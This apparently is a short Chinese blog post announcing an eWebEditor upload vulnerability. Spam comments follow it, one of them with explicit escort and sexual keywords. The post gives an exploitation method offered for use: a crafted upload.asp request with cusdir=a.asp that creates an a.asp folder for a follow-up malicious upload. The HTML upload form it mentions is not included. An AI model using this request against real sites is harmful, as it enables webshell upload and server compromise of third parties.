首页 » 默认不分类 » ewebeditor 上传漏洞鸡肋0day

ewebeditor 上传漏洞鸡肋0day

还在用ewebeditor的收手吧,这个家伙漏洞百出,就这么点程序怎么老写不好呢。

对6.X的也管用,对ASP。aspx。JSP。均管用。
利用方法:
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。

, , ,

转发到新浪微博 转发到新浪微博

目前这篇文章有5条评论(Rss)

  1. gps moto | #1
    05/16/2012 at 10:07
     

    I gotta bookmark this site it seems handy invaluable

  2. zinc | #2
    05/16/2012 at 10:13
     

    Another very entertaining post. Ive been reading through some of your posts and finally decided to drop a comment on this one. Please feel free to visit my site Doppler

  3. hotel valmontone | #3
    05/16/2012 at 13:04
     

    Very nice info and straight to the point. I am not sure if this is actually the best place to ask but do you guys have any thoughts on where to employ some professional writers? Thank you :)

  4. zinc | #4
    05/16/2012 at 20:59
     

    Another very entertaining post. Ive been reading through some of your posts and finally decided to drop a comment on this one. Please feel free to visit my site click here

  5. porno | #5
    05/17/2012 at 09:36
     

    eskort kadın eskortlar dolar orospu sex

我要评论

上一篇:

下一篇: